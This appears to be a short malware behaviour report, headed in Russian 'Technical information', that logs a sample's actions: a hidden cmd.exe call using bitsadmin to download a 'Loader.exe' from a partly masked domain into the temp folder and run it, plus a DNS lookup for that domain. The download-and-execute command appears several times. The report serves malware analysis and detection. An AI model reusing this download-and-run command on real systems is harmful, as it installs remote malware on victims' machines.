Техническая информация
- '<SYSTEM32>\cmd.exe' /C CD C: & bitsadmin /transfer dvukobs4QWBdqk4YaXhjKc54B /priority foreground https://www.co#####acionmoda.com/Loader.exe %TEMP%\l89YFCLCmHm2l.exe && start %TEMP%\l89YFCLCmHm2l.exe
- DNS ASK co#####acionmoda.com
- '<SYSTEM32>\cmd.exe' /C CD C: & bitsadmin /transfer dvukobs4QWBdqk4YaXhjKc54B /priority foreground https://www.co#####acionmoda.com/Loader.exe %TEMP%\l89YFCLCmHm2l.exe && start %TEMP%\l89YFCLCmHm2l.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer dvukobs4QWBdqk4YaXhjKc54B /priority foreground https://www.co#####acionmoda.com/Loader.exe %TEMP%\l89YFCLCmHm2l.exe